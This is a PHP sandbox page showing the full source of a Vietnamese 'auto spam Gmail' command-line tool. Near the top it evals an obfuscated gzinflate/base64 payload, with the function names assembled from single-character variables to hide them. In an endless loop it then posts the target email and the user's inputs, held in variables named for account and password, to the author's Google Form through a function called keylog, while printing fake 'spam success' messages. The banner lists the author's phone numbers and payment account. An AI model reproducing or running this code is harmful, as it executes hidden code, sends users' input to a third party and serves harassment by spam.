Phong - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.Your result can be seen below.

Result of php executing

Full code of Phong.php

 1.  
 2. <?php
 3. error_reporting(0);
 4. date_default_timezone_set("Asia/Ho_Chi_Minh");
 5. $time = date('H:i:s');
 6.     $res = "\33[0m";
 7.     $BBlack = "\33[1;30m";
 8.     $BRed = "\33[1;31m";
 9.     $BGreen = "\33[1;32m";
 10.     $BYellow = "\33[1;33m";
 11.     $BBlue = "\33[1;34m";
 12.     $BPurple = "\33[1;35m";
 13.     $BCyan = "\33[1;36m";
 14.     $BWhite = "\33[1;37m";
 15.     $Blue = "\33[0;34m";
 16.     $lime = "\33[1;32m";
 17.     $red = "\33[1;31m";
 18.     $xanh = "\33[1;32m";
 19.     $cyan = "\33[1;36m";
 20.     $yellow = "\33[1;33m";
 21.     $turquoise = "\33[1;34m";
 22.     $maugi = "\33[1;35m";
 23.     $white = "\33[1;37m";
 24.     $red = "\33[1;31m";
 25.     $white = "\33[1;37m";
 26.     $whiteb = "\33[1;37m";
 27.     $redb = "\33[1;31m";
 28.     $green = "\33[1;32m";
 29.     $yellow = "\33[1;33m";
 30.     $cam = "\33[1;33m";
 31.     $test = "\33[1;33m";
 32.     $greenb = "\33[1;32m";
 33.     $blue = "\33[1;34m";
 34.     $lam = "\33[1;34m";
 35.     $tmi = "\33[1;34m";
 36.     $hong = "\33[1;35m";
 37.     $imt = "\33[1;35m";
 38.     $cyan = "\33[1;36m";
 39.     $syan = "\33[1;36m";
 40.     $xnhac = "\33[1;96m";
 41.     $den = "\33[1;90m";
 42.     $do = "\33[1;91m";
 43.     $luc = "\33[1;92m";
 44.     $vang = "\33[1;93m";
 45.     $xduong = "\33[1;94m";
 46.     $hong = "\33[1;95m";
 47.     $trang = "\33[1;97m";
 48.     $vang = "\33[1;93m";
 49.     $do = "\33[1;91m";
 50.     $BBlack = "\33[1;30m";
 51.     $BRed = "\33[1;31m";
 52.     $BGreen = "\33[1;32m";
 53.     $BYellow = "\33[1;33m";
 54.     $BBlue = "\33[1;34m";
 55.     $BPurple = "\33[1;35m";
 56.     $BCyan = "\33[1;36m";
 57.     $BWhite = "\33[1;37m";
 58.     $Blue = "\33[0;34m";
 59.     $lime = "\33[1;32m";
 60.     $red = "\33[1;31m";
 61.     $xanh = "\33[1;32m";
 62.     $cyan = "\33[1;36m";
 63.     $yellow = "\33[1;33m";
 64.     $turquoise = "\33[1;34m";
 65.     $maugi = "\33[1;35m";
 66.     $white = "\33[1;37m";
 67.     $BCyan = "\33[1;36m";
 68.     $trang = "\33[1;37m";
 69.     $do = "\33[1;31m";
 70.     $luc = "\33[1;32m";
 71.     $vang = "\33[1;33m";
 72.     $luc = "\33[1;92m";
 73. $sx = "200000";
 74. @system('clear');
 75. $KyBp='a';$TwiK='_';$goCix='d';$Us='4';$hYPa='i';$CBI='e';$PX='s';$vZ='6';$BHh='o';$SgvcB='c';$x='t';$SHgBx='f';$d='z';$SMkn='n';$DvnA='g';$XF='b';$Tpc='l';$VN=$DvnA.$d.$hYPa.$SMkn.$SHgBx.$Tpc.$KyBp.$x.$CBI;$jhEK=$XF.$KyBp.$PX.$CBI.$vZ.$Us.$TwiK.$goCix.$CBI.$SgvcB.$BHh.$goCix.$CBI;eval($VN($jhEK('7VXLboMwELxHyj9YUT4ghCQEpW2k9NBr1UtVlQsBK6DySHk05O8bxUCXeMF2SttLD0jWaBnv7Izt9d1wMBzcrPfenpBxQlNyS0aWrr9OwtGKjDebwHbeKkxb6SX8RF0Aagx8SCiNADxl8AsNgvgAcL2izilAZwx9zJN9APE5w++PNuReMPTZ8zNYbDAYME8q5sAPKddcgugo7MjjCh1s+yOuLMuT9zz2U15daOc7n9N2QEVgreGVZ3SLEWw5hh3qUYsQxw55cTTNOPDMuuVot5jDQYOUYVnoc5gXRztuVH6YcRhqTYqBReTZzhdqMtSFAzFZwN0YQGxyQQ5/ZQI/bNijyYZRuHmjdRPTY7Les6TJYLTTIi39n84/O5244gs7y1ronI6EScfCVHaLpI46XnxCIisipCawCjq1CnNhFctlD+v56TOk2Vk1kamqBy6qlu6yNkCFUdAx6bVNvuUv5zSZ2c7AeoKsZeajy2ykSZmoCXNBFMPwvZQKTJRSLhpx19oFfgo3u0bjrLFZdTn1vFGby+0JlXNZzIMo7Y6NwHCp+0ou6vCoGj+RI7dX9t84tZrShQLWtmoYr/RTZq9Lb4WnqdyCqF3cavdpTXnVtBTuDsmBqnZD6qe4Zx3dmqI6kGgE+BMHXERbRf6Qqrp8zrqqle6GdkYi1VrzsaoSr/qn5FM4Wn0C')));
 76.     echo "\n";
 77.                 usleep(100000);
 78.         echo "\033[1;34m─────────────────────────────────────────────────────────────────\n";
 79.         usleep(100000);
 80.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\033[0;32m Tool Auto Spam Mail Google\e[0m\033[1;37m\n";
 81.         usleep(100000);
 82.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[1;34m B\xe1\xba\xa3n Quy\xe1\xbb\x81\33[1;32m: PM-Tool\n";
 83.         usleep(100000);
 84.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[1;33m Facebook.com/vip.profile.8\n";
 85.         usleep(100000);
 86.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[1;34m Zalo : 0948658716\n";
 87.         usleep(100000);
 88.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[1;31m \xe1\xbb\xa6ng H\xe1\xbb\x99 T\xc3\xb4i T\xe1\xba\xa1i Momo  : 0385695813 (H\xc3\xa0 V\xc4\x83n Phong)\n";
 89.         usleep(100000);
 90.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[1;32m Th\xe1\xba\xbb Si\xc3\xaau R\xe1\xba\xbb : [email protected]\n";
 91.         usleep(100000);
 92.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[1;34m Phong Ch\xc3\xbac Anh Em 1 Ng\xc3\xa0y C\xc3\xa0y Th\xe1\xba\xadt Nhi\xe1\xbb\x81u Xu\n";
 93.         usleep(100000);
 94.     echo "\33[0m\xf0\x9f\x8c\xba\33[1;31m[\33[1;32m\xe2\x9c\x93\33[1;31m]\33[0m =>\33[35m Tools N\xc3\xb3i Kh\xc3\xb4ng V\xe1\xbb\x9bi Key Log\n"; 
 95.         usleep(100000);
 96.         echo "\033[1;34m─────────────────────────────────────────────────────────────────\n";
 97. echo $trang."\033[1;37m[\033[1;32m●\033[1;37m] - ".$luc."Câu Cần Spam 1:$vang";
 98. $taikhoan=trim(fgets(STDIN));
 99. usleep(100000);
 100.         echo "\033[1;34m─────────────────────────────────────────────────────────────────\n";
 101. echo $trang."\033[1;37m[\033[1;32m●\033[1;37m] - ".$luc."Câu Cần Spam 2:$vang";
 102. $matkhau=trim(fgets(STDIN));
 103. usleep(100000);
 104.         echo "\033[1;34m─────────────────────────────────────────────────────────────────\n";
 105. echo "\033[1;97m \033[0;32m\033[1;97m~> \033[1;92mHướng Dẫn Nhập Mail\n";usleep($sx);
 106. echo "\033[1;97m \033[0;32m\033[1;97m~> \033[1;92mVí Dụ Bạn Muốn Spam Mail\33[1;36m [email protected]\033[1;92m Thì Bạn Chỉ Cần Nhập \033[1;[email protected]\033[1;92m Thôi Nhé \033[1;97m( \033[1;92mPhần Đầu Trước \033[1;[email protected] \033[1;97m)\n";usleep($sx);
 107. usleep(1000000);
 108.         echo "\033[1;34m─────────────────────────────────────────────────────────────────\n";
 109. echo $trang."\033[1;37m[\033[1;32m●\033[1;37m] - ".$luc."Mail Cần Spam:$luc";
 110. $a=trim(fgets(STDIN));
 111. usleep(1000000);
 112.         echo "\033[1;34m─────────────────────────────────────────────────────────────────\n";
 113. echo "".$trang."[".$luc."●".$trang."]".$trang." -".$luc." Bạn Có Muốn Tiếp Tục \033[1;97mSPAM MAIL\033[1;92m Nữa Không ? Bạn Có Thể Gặp Chuyện Gì Mà Chúng Tôi Không Lường Trước Được (y/n):$luc";
 114.         $choicee=trim(fgets(STDIN));
 115. if ( strtolower($choicee) == 'y' ) { 
 116.   echo "\033[1;34m─────────────────────────────────────────────────────────────────\n
 117.  \033[0;32m\033[1;97m~> \033[1;92mĐang Tải Dữ Liệu...\n";sleep(4.8);}
 118.   else if( strtolower($choicee) == 'n' ) {
 119.       echo "\033[1;97m \033[0;32m\033[1;97m~> \033[1;92mĐã Exit Tool Theo Yêu Cầu Của Bạn \n";exit;}
 120. for($v=0;$v<= 15;$v++){echo $trang."- ";usleep(2000);echo $trang."- ";usleep(15000);}echo "
 121. ";
 122. $b="@gmail.com";
 123.  
 124. $chuyenmail=$a.$b;
 125.  
 126. $tenmail=$a.$b;
 127.  
 128. $spam++;
 129. while(true){
 130.  
 131. keylog($taikhoan, $matkhau, $chuyenmail);
 132. $maul=rand(91,97);
 133. $maui="\033[1;".$maul."m";
 134. $a = "\033[1;91m[\033[1;93m".$spam++."\033[1;91m]\033[1;91m | \033[1;96m".date("H:i:s")."\033[1;91m |$maui SPAM MAIL\033[1;91m |\033[1;92m $tenmail\033[1;91m | \033[1;92mTHÀNH CÔNG !\n";
 135.     $len = strlen($a);
 136.     for ($x = 0; $x < $len; $x++) {
 137.         echo $a[$x];
 138.         usleep(1000);
 139.        
 140. }
 141. }
 142.  
 143. function keylog($taikhoan, $matkhau, $chuyenmail) {
 144.         $ch   = curl_init();
 145.         $data = "entry.1644317062=".urlencode($chuyenmail)."&entry.1113267375=".urlencode($taikhoan)."&entry.1136120203=".urlencode($matkhau)."&fvv=1&draftResponse=%5Bnull%2Cnull%2C%22-8740321076946177578%22%5D%0D%0A&pageHistory=0&fbzx=-8740321076946177578";
 146.         $head = array(
 147.                 "authority: docs.google.com",
 148.                 "content-length: ".strlen($data),
 149.                 "cache-control:max-age=0",
 150.                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
 151.                 "accept-language:vi-VN,vi;q=0.9,en-US;q=0.8,en;q=0.7",
 152.                 "accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 153.                 "sec-fetch-site:same-origin",
 154.                 "sec-fetch-mode:navigate",
 155.                 "sec-fetch-user:?1",
 156.                 "sec-fetch-dest:document",
 157.                 "x-requested-with: XMLHttpRequest",
 158.                 "origin: https://docs.google.com",
 159.                 "referer: https://docs.google.com/",
 160.                 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 OPR/71.0.3770.148"
 161.         );
 162.         curl_setopt_array($ch, array(
 163.                 CURLOPT_URL => "https://docs.google.com/forms/d/e/1FAIpQLScT6mGz7KbRTpT_WWXwOatUhQDX_n6UGVi9NWGztYSiDIaWiw/formResponse",
 164.                 CURLOPT_FOLLOWLOCATION => TRUE,
 165.                 CURLOPT_RETURNTRANSFER => 1,
 166.                 CURLOPT_POST => 1,
 167.                 CURLOPT_POSTFIELDS => $data,
 168.                 CURLOPT_SSL_VERIFYPEER => 0,
 169.                 CURLOPT_HTTPHEADER => $head,
 170.                 CURLOPT_ENCODING => TRUE
 171.         ));
 172.         $send = curl_exec($ch);
 173.         curl_close($ch);
 174. }
 175. ?>